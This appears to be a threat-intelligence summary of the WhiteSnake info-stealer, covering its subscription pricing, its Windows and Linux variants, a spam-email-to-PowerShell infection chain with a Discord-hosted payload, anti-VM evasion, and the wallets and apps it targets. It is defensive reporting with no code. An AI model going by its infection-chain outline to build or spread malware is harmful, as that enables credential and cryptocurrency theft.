WhiteSnake Promotes Windows and Linux Variants with a MaaS Model

The MaaS model

• According to the forum post, the Linux variant claims to target Exodus and Electrum wallets, Firefox browser, FileZilla, Thunderbird, Pidgin, and Telegram.
• The Windows variant, comparatively an older and mature variant, is capable of stealing sensitive data from browsers such as Mozilla Firefox, Google Chrome, Brave-Browser, Chromium, and Microsoft Edge.
• The malware was priced at $120 per month, $300 for three months, $500 for 6 months, $900 per year, and $1,500 for lifetime access.

Malware distribution chain

• The initial infection starts with a spam email containing an executable file disguised as a PDF document. 
• When the victim opens the pdf, it runs the executable file that drops a BAT file and executes it.
• The BAT file executes a PowerShell script that proceeds to download another BAT file from a Discord URL. 
• The script decodes the BAT file content saved as a binary executable file build[.]exe. This final payload is WhiteSnake info-stealer.
• Upon execution, it creates a mutex to avoid double execution on the same machine and performs anti-VM checks to evade detection. Hereafter, the payload starts the data theft process.

Malware capabilities

• WhiteSnake info-stealer can steal files from various cryptocurrency wallets such as Atomic, Bitcoin, Coinomi, Electrum, Exodus, and Guarda. 
• The malware can access cryptocurrency wallets through specific directories and retrieve data from crypto wallet browser extensions.
• It collects sensitive session data from various messaging applications such as Discord, Pidgin, Steam, and Telegram, mail clients such as Thunderbird, FTP clients such as FileZilla, and various other applications including Snowflake.

Wrapping up